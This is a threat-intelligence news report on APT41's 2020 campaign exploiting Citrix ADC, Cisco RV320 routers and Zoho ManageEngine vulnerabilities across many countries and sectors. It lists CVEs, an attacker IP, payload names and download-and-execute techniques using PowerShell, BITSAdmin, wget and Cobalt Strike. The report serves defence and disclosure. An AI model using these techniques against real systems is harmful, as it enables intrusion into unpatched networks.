APT 41, China-linked hackers groups launched a massive cyberattack on countries including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK, and USA by exploits that trigger the vulnerabilities in Cisco, Citrix, Zoho products.
The three main products being exploited in this attack are Citrix Application Delivery Controller (ADC), Cisco routers and Zoho ManageEngine Desktop Central. Researchers found that the attack happened between January 20 and March 11 and it targeted Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility.
Initially, it’s observed that threat actors tried to exploit ADC vulnerability CVE-2019-19781.The exploitation attempt involved execution of the command ‘file /bin/pwd’ that helps them to identify the vulnerable and patched system in the victim’s network. In February, APT 41 actors started downloading the unknown payload from File Transfer Protocol (FTP) and the payload named “bsd” that looked like a backdoor.
Cisco RV320 routers were exploited on February 21,2020, but the researches couldn’t find the specific exploit used. Attackers used Metasploit module which combines CVE-2019-1653 and CVE-2019-1652 to enable remote code execution on Cisco RV320 and RV325 (small business routers) and uses wget to download the specified payload. Finally, APT actors attacked Zoho ManageEngine Desktop Central versions before 10.0.474 (CVE-2020-10189) that contained a zero-day remote code execution vulnerability.
FireEye observed that APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability. Five customers at FireEye were reportedly compromised during the attempt. APT 41 Attackers directly upload “logger.zip”, a simple Java-based program, which contains a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.
Attackers also leverage the Microsoft BITSAdmin command-line tool to download install.bat that helps them to install persistence for a trial version of the Cobalt Strike BEACON loader.
All three vulnerabilities have been patched and organisations must apply the patches as quickly as possible to protect their networks from unauthorised access.